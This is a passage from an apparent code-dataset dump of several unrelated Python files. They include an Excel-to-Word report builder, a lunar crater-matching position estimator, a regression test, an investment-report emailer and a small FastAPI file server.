This one will return 462\n# With index in hand, call the 'run' function again and start from url position 462, give the function a range\n# print(urls.index('https://www.odmp.org/search?from=1951&to=2000&o=100'))\n\n\n\n# String url = webdriver.getCurrentUrl();\n# Then, all you have to do is replace old guid with a new guid.\n\n# int numOfChars = 36;\n# int posOfQuestionMark = url.indexOf(\"?\");\n# String newGuid = \"...\"; // put new/wrong guid value here\n# String newUrl = url.substring(0, posOfQuestionMark-numOfChars)+newGuid+url.substring(posOfQuestionMark);\n# --Edit--\n\n# Now, load this new url in the browser.\n\n# webdriver.get(newUrl);","repo_name":"alanhovorka/queries","sub_path":"police_deaths/attempt1.py","file_name":"attempt1.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6372446890","text":"import datetime\nimport os\n\nfrom Excel import ExcelWrap\nfrom Word import WordWrap\n\n\nclass Filemaker:\n def __init__(self, file_path):\n self.cwd = os.getcwd()\n self.file_path = file_path\n self.excel = ExcelWrap(self.file_path)\n self.word = WordWrap()\n\n def getHeader(self):\n now = datetime.datetime.now()\n f = open(\"Header\", \"r\")\n return f.read() + ' ' + str(now.year)\n\n def totalProfit(self, data):\n summ = 0\n for d in data:\n summ += float(str(d).replace(',', '.'))\n return summ\n\n def getMain(self, data):\n data_d = {}.fromkeys(data, 0)\n maxx = 0\n max_n = None\n for a in data:\n data_d[a] += 1\n if data_d[a] > maxx:\n maxx = data_d[a]\n max_n = a\n return [max_n, maxx]\n\n def getProfitByCategories(self, category, profit):\n data_d = {}.fromkeys(category, 0)\n for i in range(self.excel.maxHeight - 1):\n number = round(float(str(profit[i]).replace(',', '.')))\n data_d[category[i]] += number\n\n return data_d\n\n def generte(self):\n self.word.addHeader(self.getHeader())\n print(self.excel.getCell(1, 9))\n\n data = self.getMain(self.excel.getWerticalRange(5, 2, self.excel.maxHeight + 1))\n\n # word.getStyleList()\n\n main_ship = \"Last year, our company mainly used \" + str(data[0]) + \" ship mode in count \" + str(\n data[1]) + \" of \" + str(\n self.excel.maxHeight) + \" total (\" + str(round((data[1] / self.excel.maxHeight) * 100)) + \"%). 
\"\n\n data = self.getMain(self.excel.getWerticalRange(9, 2, self.excel.maxHeight + 1))\n\n main_interest = \"Products were mainly interest to \" + str(data[0]) + \" customer segment.\"\n\n data = self.totalProfit(self.excel.getWerticalRange(6, 2, self.excel.maxHeight + 1))\n total_profit = \"Total profit is \" + str(round(data, 2)) + \".\"\n\n print(main_ship + main_interest + total_profit)\n\n data = self.getProfitByCategories(self.excel.getWerticalRange(10, 2, self.excel.maxHeight + 1),\n self.excel.getWerticalRange(6, 2, self.excel.maxHeight + 1))\n max = 0\n value = None\n for d in range(data.__len__()):\n if float(list(data.values())[d]) > max:\n max = list(data.values())[d]\n value = list(data.keys())[d]\n\n print(max, value)\n\n product_max_profit = 'The most profit comes from the sale of ' + value + ' product category (' + str(max) + ')'\n\n self.word.addParagraph(main_ship + main_interest + total_profit + product_max_profit)\n\n # word.addInlineExcelChart(file_path, 'D1', 640, 480)\n\n self.word.addParagraph(\"Monthly profit is shown in the following chart.\")\n self.excel.getChart2()\n self.word.addInlineExcelChart(self.cwd + '\\\\1.bmp')\n\n self.word.saveAs(self.cwd + '\\\\report.docx')\n\n self.excel.close()\n self.word.close()\n","repo_name":"leokk/ExcelToWord","sub_path":"FileMaker.py","file_name":"FileMaker.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2410179108","text":"# External libraries\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\nimport pandas as pd\nimport astropy\nimport scipy\nfrom filterpy.kalman import KalmanFilter \nfrom filterpy.common import Q_discrete_white_noise\nfrom scipy.linalg import block_diag\nfrom astropy import units as u\nfrom poliastro.bodies import Earth, Mars, Sun, Moon\nfrom poliastro.twobody import Orbit\nfrom poliastro.plotting import OrbitPlotter2D\nfrom poliastro.plotting import OrbitPlotter3D\nfrom sklearn import linear_model, datasets\nimport glob\n\n# Own Libraries\nfrom utility.utils import *\nfrom EKF.kf import *\nfrom CAMDetector.detect import *\nfrom CMA.pair import *\nfrom CMA.icp import *\n\nstyle.use('seaborn-paper')\n\nglobal km2px, deg2km, px2km, deg2px\nglobal DT, TOL1, TOL2, TOL_S1, TOL_S2\n\n\ndef find_solution():\n\n def check_sol(I,J, tol, mode='natural'):\n # Auxiliary function to check if the solution is correct using the tolerance\n # mode = 'natural' or 'inverse'\n if mode == 'natural':\n row1 = iss[I]\n tmp = S[I].iloc[J]\n elif mode == 'inverse':\n row1 = S[I].iloc[J]\n tmp = iss[I]\n\n\n left_id = np.argmin([row1.lon1, row1.lon2, row1.lon3])\n right_id = np.argmax([row1.lon1, row1.lon2, row1.lon3])\n\n if left_id==0:\n left = [row1.lon1, row1.lat1, row1.r1]\n elif left_id==1:\n left = [row1.lon2, row1.lat2, row1.r2]\n elif left_id==2:\n left = [row1.lon3, row1.lat3, row1.r3] \n\n if right_id==0:\n right = [row1.lon1, row1.lat1, row1.r1]\n elif right_id==1:\n right = [row1.lon2, row1.lat2, row1.r2]\n elif right_id==2:\n right = [row1.lon3, row1.lat3, row1.r3] \n\n\n x1,x2,x3 = tmp.x1, tmp.x2, tmp.x3\n y1,y2,y3 = tmp.y1, tmp.y2, tmp.y3\n r1,r2,r3 = tmp.r1, tmp.r2, tmp.r3\n\n Left_id = np.argmin([x1,x2,x3])\n Right_id = np.argmax([x1,x2,x3])\n\n if Left_id==0:\n Left = [x1, y1, r1]\n elif Left_id==1:\n Left = [x2,y2,r2]\n elif Left_id==2:\n Left = [x3,y3,r3] \n\n if Right_id==0:\n Right = [x1,y1,r1]\n elif Right_id==1:\n Right = [x2,y2,r2]\n elif 
Right_id==2:\n Right = [x3,y3,r3]\n\n a=left[2]/Left[2]\n b=right[2]/Right[2]\n\n if a-b < tol:\n return True\n else: return False\n\n\n def plot_sol(I,J, mode):\n if mode == 'natural':\n row1 = iss[I]\n tmp = S[I].iloc[J]\n elif mode == 'inverse':\n tmp = iss[I]\n row1 = S[I].iloc[J]\n\n CAMx, CAMy = ((lon_bounds[0] + lon_bounds[1]) / 2,\n (lat_bounds[0] + lat_bounds[1]) / 2)\n\n\n crt1 = np.array([ row1.lon1, row1.lat1, row1.r1 ])\n crt2 = np.array([ row1.lon2, row1.lat2, row1.r2 ])\n crt3 = np.array([ row1.lon3, row1.lat3, row1.r3 ])\n triplet = [crt1, crt2, crt3]\n\n\n # img=cv2.imread(filename)\n img=np.zeros((850,850,3))\n deg2px = 256\n for crt in triplet:\n # crater center:\n xc, yc, rc = crt[0], crt[1], crt[2] # This is in the absolute frame\n # f: Absolute --> f: Relative\n xc = xc - CAMx\n yc = yc - CAMy\n # f: relative --> f: OPENCV\n xc *= deg2px # Now in pixels, not in lon deg\n yc *= deg2px # Now in pixels, not in lat deg\n # rc *= u # Now in pixels, not in lat deg\n\n\n xc = 850/2 + xc\n yc = 850/2 - yc\n center_coordinates = (int(xc), int(yc))\n # ? 1 km = 8.4746 px in our DEM := Merge LOLA - KAGUYA\n radius = int(crt[2] * km2px)\n color = (255, 255, 255)\n thickness = 3\n img_prova = cv2.circle(img, center_coordinates, radius, color, thickness)\n\n plt.figure(dpi=130)\n plt.subplot(121)\n plt.imshow(img_prova)\n plt.xlabel('CAT')\n plt.show()\n\n\n cp1 = cv2.imread(filename)\n x1,x2,x3 = tmp.x1, tmp.x2, tmp.x3\n y1,y2,y3 = tmp.y1, tmp.y2, tmp.y3\n r1,r2,r3 = tmp.r1, tmp.r2, tmp.r3\n cr1 = np.array([x1,y1,r1]) \n cr2 = np.array([x2,y2,r2]) \n cr3 = np.array([x3,y3,r3])\n crts = np.vstack([cr1,cr2,cr3])\n plt.subplot(122)\n plt.xlabel('DET')\n IMG1 = img_plus_crts(cp1, crts, color=\"red\")\n plt.imshow(IMG1)\n plt.show()\n\n def find_slope(P1:np.array,P2:np.array) -> float:\n slope = (P2[1]-P1[1])/(P2[0]-P1[0])\n return slope\n\n\n\n def check_sol2(I,J, tol, mode): \n if mode == 'natural':\n B = iss[I]\n A = S[I].iloc[J]\n elif mode == 'inverse':\n B = S[I].iloc[J]\n A = iss[I]\n\n hp = A\n x1_a, x2_a, x3_a = float(hp.x1), float(hp.x2), float(hp.x3)\n y1_a, y2_a, y3_a = float(hp.y1), float(hp.y2), float(hp.y3)\n r1_a, r2_a, r3_a = float(hp.r1), float(hp.r2), float(hp.r3)\n\n A1 = np.hstack([x1_a, y1_a, r1_a])\n A2 = np.hstack([x2_a, y2_a, r2_a])\n A3 = np.hstack([x3_a, y3_a, r3_a])\n\n A = np.vstack([A1, A2, A3])\n\n hp = B\n x1_b, x2_b, x3_b = float(hp.lon1), float(hp.lon2), float(hp.lon3)\n y1_b, y2_b, y3_b = float(hp.lat1), float(hp.lat2), float(hp.lat3)\n r1_b, r2_b, r3_b = float(hp.r1), float(hp.r2), float(hp.r3)\n\n x1_b_r, y1_b_r, r1_b_r = absolute2relative([x1_b, y1_b, r1_b], CAMx, CAMy)\n x2_b_r, y2_b_r, r2_b_r = absolute2relative([x2_b, y2_b, r2_b], CAMx, CAMy)\n x3_b_r, y3_b_r, r3_b_r = absolute2relative([x3_b, y3_b, r3_b], CAMx, CAMy)\n\n B1 = np.hstack([x1_b_r, y1_b_r, r1_b_r])\n B2 = np.hstack([x2_b_r, y2_b_r, r2_b_r])\n B3 = np.hstack([x3_b_r, y3_b_r, r3_b_r])\n\n B = np.vstack([B1, B2, B3])\n\n # identify points A:\n x1,x2,x3 = A[0][0], A[1][0], A[2][0]\n y1,y2,y3 = A[0][1], A[1][1], A[2][1]\n r1,r2,r3 = A[0][2], A[1][2], A[2][2]\n # Pick the ids:\n Left_id = np.argmin([x1,x2,x3])\n Right_id = np.argmax([x1,x2,x3])\n for k in [0,1,2]: \n if (k != Left_id) & (k != Right_id): Center_id = k \n # Reassign coordinates according to the ids:\n if Left_id==0:\n Left = [x1, y1, r1]\n elif Left_id==1:\n Left = [x2,y2,r2]\n elif Left_id==2:\n Left = [x3,y3,r3] \n\n if Right_id==0:\n Right = [x1,y1,r1]\n elif Right_id==1:\n Right = [x2,y2,r2]\n elif 
[x3,y3,r3]\n\n if Center_id==0:\n Center = [x1,y1,r1]\n elif Center_id==1:\n Center = [x2,y2,r2]\n elif Center_id==2:\n Center = [x3,y3,r3]\n # Calculate Orientation:\n alfa1 = find_slope(Left, Center)\n alfa2 = find_slope(Center, Right)\n alfa3 = find_slope(Left, Right)\n # print('\\n')\n # print(alfa1,alfa2, alfa3)\n # identifiy points B:\n x1,x2,x3 = B[0][0], B[1][0], B[2][0]\n y1,y2,y3 = B[0][1], B[1][1], B[2][1]\n r1,r2,r3 = B[0][2], B[1][2], B[2][2]\n # Pick the ids:\n Left_id = np.argmin([x1,x2,x3])\n Right_id = np.argmax([x1,x2,x3])\n for id in [0,1,2]: \n if (id != Left_id) & (id != Right_id): Center_id = id \n # Reassign relate to ids:\n if Left_id==0:\n Left = [x1, y1, r1]\n elif Left_id==1:\n Left = [x2,y2,r2]\n elif Left_id==2:\n Left = [x3,y3,r3] \n\n if Right_id==0:\n Right = [x1,y1,r1]\n elif Right_id==1:\n Right = [x2,y2,r2]\n elif Right_id==2:\n Right = [x3,y3,r3]\n\n if Center_id==0:\n Center = [x1,y1,r1]\n elif Center_id==1:\n Center = [x2,y2,r2]\n elif Center_id==2:\n Center = [x3,y3,r3]\n # Calculate Orientation:\n beta1 = find_slope(Left, Center)\n beta2 = find_slope(Center, Right)\n beta3 = find_slope(Left, Right)\n # print('\\n')\n # print(beta1,beta2,beta3)\n # R, t = icp(A,B)\n\n # sinteta = R[1,0]\n # costeta = R[0,0]\n # tanteta = sinteta/costeta\n # teta = np.arctan(tanteta)\n # teta = np.rad2deg(teta)\n\n # if abs(teta) < tol: return True\n # else: return False\n\n if (abs(alfa1-beta1) < tol) & (abs(alfa2-beta2) < tol) & (abs(alfa3-beta3) < tol): return True\n else: return False\n\n\n def filter_quartile(Xs):\n X = pd.DataFrame(Xs)\n # z = abs(stats.zscore(Z))\n # print(z)\n Q1 = X.quantile(0.48)\n Q3 = X.quantile(0.52)\n IQR = Q3 - Q1\n X = X[np.logical_not((X < (Q1 - 1.5 * IQR)) | (X > (Q3 + 1.5 * IQR)))]\n X = X.dropna()\n return np.array(X)\n################################################################################################\n# MAIN\n################################################################################################\n\n\n\n\n# def find_solution(TOL_S1, TOL_S2, TOL1, TOL2):\n ZF = []\n CRATERS_CAT, CRATERS_DET = [], []\n for idx in range(61):\n # Loading All Images:\n dict = load_all_images(dt=DT)\n # Img:\n filename = dict[str(idx+1)]\n img=cv2.imread(filename)\n # Detection:\n t1 = time.time()\n craters_det = detect(img)\n # Removing minor craters:\n craters_det = craters_det[craters_det[:,2] > 15]\n t2 = time.time()\n save_craters_det = craters_det.shape[0]\n print(f'Detection Time:{t2-t1:.2f}\\n')\n # Pandas DataFrame:\n df_craters_det = sort_mat(craters_det)\n # Find all triplets:\n t1 = time.time()\n triplets = find_all_triplets(craters_det)\n triplets_det= pd.DataFrame(triplets, columns=['Angle1','Angle2','Angle3','des1','des2','des3','x1','y1','r1','x2','y2','r2','x3', 'y3', 'r3'])\n triplets_det.shape\n t2 = time.time()\n print('\\n')\n print(f'Total craters founded:{craters_det.shape[0]}')\n print(f'Number of total combinations:{triplets_det.shape[0]}\\nComputational time: {t2-t1:.2f} s')\n\n\n\n # Opening Database:\n DB = pd.read_csv('DATA/H_L_combined.csv')\n # DB = pd.read_csv('DATA/lunar_crater_database_robbins_2018.csv')\n # Filtering:\n span = 3.29/2 * 1. 
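# presumably half of a 3.29 deg image footprint, scaled by 1.0; used for the catalog search bounds below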
\n lat_bounds=[-span, span]\n get_lon = float(filename.split('_')[-1].split('jpg')[0][:-2])\n lon_bounds=[get_lon-span,get_lon+span]\n\n craters_cat = CatalogSearch(DB, lat_bounds, lon_bounds, CAT_NAME='COMBINED')\n if craters_cat is not None:\n km2deg = 1/deg2km\n craters_cat = craters_cat[(craters_cat.Diam < 40)&(craters_cat.Diam > 2.5)]\n craters_cat['Diam']*=0.5*km2deg # km --- > deg\n save_craters_cat = craters_cat.shape[0]\n\n craters_cat_m = np.array(craters_cat)\n\n t1 = time.time()\n triplets_cat_m = find_all_triplets(craters_cat_m)\n triplets_cat = pd.DataFrame(triplets_cat_m, columns=['Angle1','Angle2','Angle3','des1','des2','des3','lon1','lat1', 'r1','lon2', 'lat2','r2','lon3','lat3','r3'])\n triplets_cat['r1'] *= deg2km\n triplets_cat['r2'] *= deg2km\n triplets_cat['r3'] *= deg2km\n t2 = time.time()\n print(f'Total craters catalogued:{craters_cat.shape[0]+1}')\n print(f'Number of total combinations:{triplets_cat.shape[0]}\\nComputational time: {t2-t1:.2f} s')\n else:\n print('No craters in cat!')\n\n\n if VERBOSE:\n #img1\n plt.figure(dpi=200, tight_layout=True)\n cp1 = deepcopy(img)\n img_det = img_plus_crts(img, craters_det)\n plt.subplot(122)\n plt.xticks([0,848/2,848],[f'{lon_bounds[0]:.2f}°',f'{(lon_bounds[1]+lon_bounds[0])/2:.2f}°',f'{lon_bounds[1]:.2f}°'])\n plt.yticks([0,848/2,848],[f'{lat_bounds[0]:.2f}°',f'{(lat_bounds[1]+lat_bounds[0])/2:.2f}°',f'{lat_bounds[1]:.2f}°'])\n plt.imshow(img_det)\n plt.xlabel('LON')\n plt.ylabel('LAT')\n plt.show()\n\n # FIG.2\n cp1 = deepcopy(img)\n # DB = pd.read_csv('DATA/lunar_crater_database_robbins_2018.csv')\n DB = pd.read_csv('DATA/H_L_combined.csv')\n df = CatalogSearch(DB, lat_bounds, lon_bounds, CAT_NAME='COMBINED')\n image_with_craters = draw_craters_on_image(df, lon_bounds, lat_bounds, cp1, u=None)\n\n plt.subplot(121)\n plt.imshow(image_with_craters)\n plt.xticks([0,850/2,850],[f'{lon_bounds[0]:.2f}°',f'{(lon_bounds[1]+lon_bounds[0])/2:.2f}°',f'{lon_bounds[1]:.2f}°'])\n plt.yticks([0,850/2, 850],[f'{lat_bounds[0]:.2f}°',f'{(lat_bounds[1]+lat_bounds[0])/2:.2f}°',f'{lat_bounds[1]:.2f}°'])\n plt.xlabel('LON')\n plt.ylabel('LAT')\n plt.show()\n\n\n\n tol1 = TOL_S1\n\n t1 = time.time()\n QUERY1 = triplets_cat\n QUERY2 = triplets_det\n QUERY1 = dropduplicates(QUERY1)\n QUERY2 = dropduplicates(QUERY2) \n\n if QUERY1.shape[0] 0:\n S.append(s)\n iss.append(items[i])\n t2 = time.time()\n print(f'Computational time: {t2-t1:.2f} s\\nPossible list Combinations: {len(S)}')\n\n\n\n # TEST\n CAMx, CAMy = ( (lon_bounds[0] + lon_bounds[1]) / 2, (lat_bounds[0] + lat_bounds[1]) / 2) # Location Absolute\n if mode == 'natural':\n for I in range(len(iss)):\n row1 = iss[I]\n J = 0\n for J in range(S[I].shape[0]):\n tmp = S[I].iloc[J]\n\n diff = compute_pos_diff(tmp, row1, CAMx, CAMy)\n diff = np.array(diff) # Is in pixel\n q = diff*px2km\n if np.all( abs(q) < 2):\n print(q, I,J)\n J+=1\n else:\n for I in range(len(S)):\n row1 = iss[I]\n J = 0\n for J in range(S[I].shape[0]):\n tmp = S[I].iloc[J]\n\n diff = compute_pos_diff(row1,tmp,CAMx, CAMy)\n diff = np.array(diff) # Is in pixel\n q = diff*px2km\n if np.all( abs(q) < 2):\n print(q, I,J)\n J+=1\n # VERIFICA:\n Is, Js = [], []\n for I in range(len(iss)):\n row1 = iss[I]\n for J in range(S[I].shape[0]):\n if check_sol(I,J, TOL1, mode): \n if check_sol2(I,J, TOL2, mode):\n Is.append(I)\n Js.append(J)\n print(I,J)\n Is = np.array(Is)\n Js = np.array(Js)\n\n\n\n Ts = []\n for i, j in zip(Is,Js):\n if mode == 'natural':\n tc = iss[i]\n td = S[i].iloc[j]\n elif mode == 'inverse':\n td = iss[i]\n tc = 
S[i].iloc[j]\n\n        hp = td\n        x1_a, x2_a, x3_a = float(hp.x1), float(hp.x2), float(hp.x3)\n        y1_a, y2_a, y3_a = float(hp.y1), float(hp.y2), float(hp.y3)\n        r1_a, r2_a, r3_a = float(hp.r1), float(hp.r2), float(hp.r3)\n\n        A1 = np.hstack([x1_a, y1_a])\n        A2 = np.hstack([x2_a, y2_a])\n        A3 = np.hstack([x3_a, y3_a])\n\n        A = np.vstack([A1, A2, A3])\n\n        hp = tc\n        x1_b, x2_b, x3_b = float(hp.lon1), float(hp.lon2), float(hp.lon3)\n        y1_b, y2_b, y3_b = float(hp.lat1), float(hp.lat2), float(hp.lat3)\n        r1_b, r2_b, r3_b = float(hp.r1), float(hp.r2), float(hp.r3)\n\n        x1_b_r, y1_b_r, r1_b_r = absolute2relative([x1_b, y1_b, r1_b], CAMx, CAMy)\n        x2_b_r, y2_b_r, r2_b_r = absolute2relative([x2_b, y2_b, r2_b], CAMx, CAMy)\n        x3_b_r, y3_b_r, r3_b_r = absolute2relative([x3_b, y3_b, r3_b], CAMx, CAMy)\n\n        B1 = np.hstack([x1_b_r, y1_b_r])\n        B2 = np.hstack([x2_b_r, y2_b_r])\n        B3 = np.hstack([x3_b_r, y3_b_r])\n\n        B = np.vstack([B1, B2, B3])\n\n        R, t = icp(A,B)\n        Ts.append(t)\n    print(len(Ts))\n\n\n\n    # Reallocate points\n    Xs, Ys = [], []\n    for t in Ts:\n        Xs.append(t[0])\n        Ys.append(t[1])\n\n    # Calculate Error on position\n    if len(Ts)>3:\n        Xs = filter_quartile(Xs)\n        Ys = filter_quartile(Ys)\n        Xs = np.mean(Xs)\n        Ys = np.mean(Ys)\n        Z = np.hstack([Xs,Ys])\n        ZF.append(abs(Z*px2km*1000))\n        CRATERS_CAT.append(save_craters_cat)\n        CRATERS_DET.append(save_craters_det)\n\n    elif len(Ts)>0:\n        Xs = np.mean(Xs)\n        Ys = np.mean(Ys)\n        Z = np.hstack([Xs,Ys])\n        ZF.append(abs(Z*px2km*1000))\n        CRATERS_CAT.append(save_craters_cat)\n        CRATERS_DET.append(save_craters_det)\n    else:\n        print('No combination Found, impossible to estimate position...')\n        ZF.append(np.array([-1,-1]))\n        CRATERS_CAT.append(-1)\n        CRATERS_DET.append(-1)\n\n    CRATERS_CAT= np.array(CRATERS_CAT)\n    CRATERS_DET= np.array(CRATERS_DET)\n\n    CRATERS_CAT= CRATERS_CAT[CRATERS_CAT>0]\n    CRATERS_DET= CRATERS_DET[CRATERS_DET>0]\n\n    X,Y = [], []\n    for i in ZF:\n        if np.all( i > 0):\n            X.append(i[0])\n            Y.append(i[1])\n    \n    X = np.array(X)\n    Y = np.array(Y)\n\n    X_mean = np.mean(filter_quartile(X))\n    Y_mean = np.mean(filter_quartile(Y))\n    if len(X) > 0:\n        plt.figure(dpi=300)\n        plt.scatter(range(len(X)),X)\n        plt.scatter(range(len(Y)),Y)\n        plt.legend(['Error-X','Error-Y'])\n        plt.title(f'TOL_S1:{TOL_S1}, TOL_S2:{TOL_S2}, TOL1:{TOL1}, TOL2:{TOL2}')\n        plt.ylabel('m')\n        plt.xlabel('Estimation completed')\n        plt.ylim([0, 2000])\n        plt.savefig(f'A_Mx_{X_mean:.2f}_My_{Y_mean:.2f}_Comp_{X.shape[0]:.2f}.jpg')\n        plt.show()\n\n        plt.figure(dpi=300)\n        plt.scatter(range(len(CRATERS_CAT)), CRATERS_CAT)\n        plt.scatter(range(len(CRATERS_DET)), CRATERS_DET)\n        plt.legend(['Craters Cat','Craters Det'])\n        plt.title(f'TOL_S1:{TOL_S1}, TOL_S2:{TOL_S2}, TOL1:{TOL1}, TOL2:{TOL2}')\n        plt.savefig(f'B_Mx_{X_mean:.2f}_My_{Y_mean:.2f}_Comp_{X.shape[0]:.2f}.jpg')\n        plt.show()\n\n\nif __name__ == '__main__':\n\n    VERBOSE=False\n    DT = 10\n\n    for TOL1 in [0.08,0.1,0.12,0.14]:\n        for TOL2 in [0.8,0.10,0.12,0.14,0.16]:\n            for TOL_S1 in [3,4,5,6,7]:\n                for TOL_S2 in [0.8,1,1.2,1.4]:\n                    find_solution()\n                    plt.close('all')","repo_name":"sirbastiano/AINavi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"9349749490","text":"from LinearRegression1D import *\nfrom NormalEquation import *\nfrom sklearn import datasets\n\n\nM = 1 #No. of features. Set M = 1 to test LinearRegression1D\nN = 100 #No. 
of Samples\n\nx, y, coef = datasets.make_regression(n_samples=N,#number of samples\n                          n_features=M,#number of features\n                          n_informative=M,#number of useful features \n                          noise=25,#bias and standard deviation of the gaussian noise\n                          coef=True,#true coefficient used to generate the data\n                          random_state=42) #set for same data \n\n\n#mlr = LinearRegression1D() #Un-comment to fit using LinearRegression1D\nmlr = NormalEquation() #Un-comment to fit using NormalEquation\nmlr.fit(x,y)\nmlr.error_metrics()\nmlr.fit_plot() \n\n\n\n","repo_name":"biswarupk98/Intro-to-computing-in-ai-ml","sub_path":"A4_biswarupk_21055/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"7382821652","text":"import datetime\nimport json,time\n\nfrom Investir import Log, Sheet, Historico\nfrom Ploting import Plot\nfrom Email import EnviaEmail\n\ndef j_data(json_file):\n    with open(json_file, 'r') as read:\n        return json.load(read)\n\ndef adiciona_horario():\n    timestamp = int(datetime.datetime.timestamp(datetime.datetime.now())) + 60\n    novo_horario = datetime.datetime.fromtimestamp(timestamp).strftime('%H:%M')\n    return novo_horario\n\nJSON_FILE = 'investimentos.json' # arquivo json que ficarao os dados recentes\nJSON_FILE_HIST = 'investimentos_historico.json' # arquivo json com os dados historicos para o grafico\nSHEET_URL = ['https://www.googleapis.com/auth/spreadsheets.readonly']\nSHEET_ID = '' # id da sua planilha\nRANGE_NAME = 'Investimentos!A2:E' # planilha aba Investimentos coluna inciando da celula A2 até E\nTOKEN = 'token.json'\nCREDENCIAIS = 'credencials.json'\n\nend_email_envio = '' # endereço de email (gmail) que enviará\nsenha_envio = '' # senha para logar na caixa de email do google\nend_email_recebe = '' # endereco do destino\nCOLOR = 3\n\nhora_programada = ['08:00', '09:00', '10:00', '11:00', '11:50']\nhora_envio = '12:00'\nconteudo = \"\"\n\ndef atualiza():\n    global hora_programada\n    global conteudo\n    try:\n        momento_execucao = datetime.datetime.now().strftime('%H:%M')\n        if momento_execucao in hora_programada:\n            Log.informacao('criando lista com dados da nuvem')\n            sheet = Sheet(TOKEN, CREDENCIAIS, SHEET_ID, RANGE_NAME, SHEET_URL)\n            l_sheet = sheet.get_sheet()\n            Log.informacao('iniciando o tratamento dos dados')\n            relatorio = Historico(l_sheet, JSON_FILE, JSON_FILE_HIST)\n            relatorio.atualiza_dados()\n            relatorio.atualiza_dados_historico(JSON_FILE_HIST, l_sheet)\n            conteudo = relatorio.rendimentos_str(JSON_FILE_HIST)\n            hora_programada = ['08:00', '09:00', '10:00', '11:00', '11:50']\n    except Exception as erro:\n        Log.informacao(f'houve erro na execução do metodo atualiza(), {erro}')\n        hora_programada.append(adiciona_horario())\n\ndef relatorios():\n    global hora_envio\n    plt = Plot(j_data(JSON_FILE_HIST),j_data(JSON_FILE_HIST), COLOR)\n    try:\n        momento_execucao = datetime.datetime.now().strftime('%H:%M')\n        if momento_execucao == hora_envio:\n            Log.informacao('iniciando tratativa para envio do email')\n            email = EnviaEmail(end_email_envio, end_email_recebe, senha_envio, conteudo)\n            email.insere_imagem(plt.plot_todos())\n            email.insere_imagem(plt.plot())\n            email.envia()\n            hora_envio = '12:00'\n        else:\n            Log.informacao(f'aguardando momento do envio do relatorio: {hora_envio} horas')\n    except Exception as erro:\n        Log.informacao(f'houve erro na execução do metodo relatorios(), {erro}')\n        hora_envio = adiciona_horario()\n\ndef main():\n    atualiza()\n    relatorios()\n\ndef teste():\n    pass\n\nif __name__ == 
'__main__':\n while True:\n main()\n # teste()\n time.sleep(60)","repo_name":"ram-eron/relatorio_investimentos","sub_path":"Relatorio.py","file_name":"Relatorio.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2079817516","text":"import asyncio\nimport mimetypes\nfrom pathlib import Path\nfrom typing import List\n\nimport aiohttp as aiohttp\nimport uvicorn\nfrom fastapi import FastAPI, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.middleware.gzip import GZipMiddleware\nfrom fastapi.responses import FileResponse, Response\n\nimport preview_builder\nimport utils\nfrom models import FileInfo, ServerFilePath\n\nBASE_FILE_PATH = \"C:/Users/Yan_X/Desktop/\"\nMIME_FILE_PATH = \"mime.types\"\nBACKEND_BASE_URL = \"http://localhost:3000/\"\n\nmimetypes.init([MIME_FILE_PATH])\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.add_middleware(GZipMiddleware, minimum_size=1000)\n\nclient_session = aiohttp.ClientSession(base_url=BACKEND_BASE_URL)\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event():\n await client_session.close()\n\n\n@app.get(\"/\")\nasync def root():\n return await read_file_path('')\n\n\n@app.get(\"/{file_path:path}\")\nasync def read_file_path(file_path: str, download: int = 0, preview: int = 0):\n local_path = Path(BASE_FILE_PATH + file_path)\n if local_path.exists() and local_path.is_file():\n if preview:\n tmp_local_path = preview_builder.image_builder(file_path)\n\n return FileResponse(tmp_local_path, content_disposition_type='inline', filename=Path(tmp_local_path).name)\n if download:\n return FileResponse(local_path, content_disposition_type='attachment', filename=local_path.name)\n else:\n return FileResponse(local_path, content_disposition_type='inline', filename=local_path.name)\n\n async with client_session.get('/' + file_path) as response:\n return Response(await response.content.read(), response.status, response.headers)\n\n\n@app.post(\"/api/path_info\", response_model=List[FileInfo])\nasync def path_info(path: ServerFilePath):\n info_list: List[FileInfo] = []\n\n local_path = Path(BASE_FILE_PATH + path.path)\n\n if not local_path.exists():\n raise HTTPException(status_code=400, detail=\"Path is not exists\")\n if local_path.is_file():\n raise HTTPException(status_code=400, detail=\"Path is a file\")\n\n info_list.append(FileInfo(\".\", local_path.stat()))\n\n if local_path != Path(BASE_FILE_PATH):\n info_list.append(FileInfo(\"..\", local_path.parent.stat()))\n\n for i_file in local_path.iterdir():\n info_list.append(FileInfo(i_file.name, i_file.stat()))\n\n return info_list\n\n\nasync def main():\n config = uvicorn.Config(\"main:app\", port=8000, log_level=\"info\")\n server = uvicorn.Server(config)\n await server.serve()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"yanxiangrong/file-station","sub_path":"Backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30700761000","text":"\"\"\"Built-in converters.\"\"\"\n\nimport collections.abc as collections\nimport enum\nimport functools\nimport inspect\nfrom typing import Any, Callable, Dict, Iterable, List, Mapping, Optional, Sequence, Set, Tuple, TypeVar, cast\n\nfrom . 
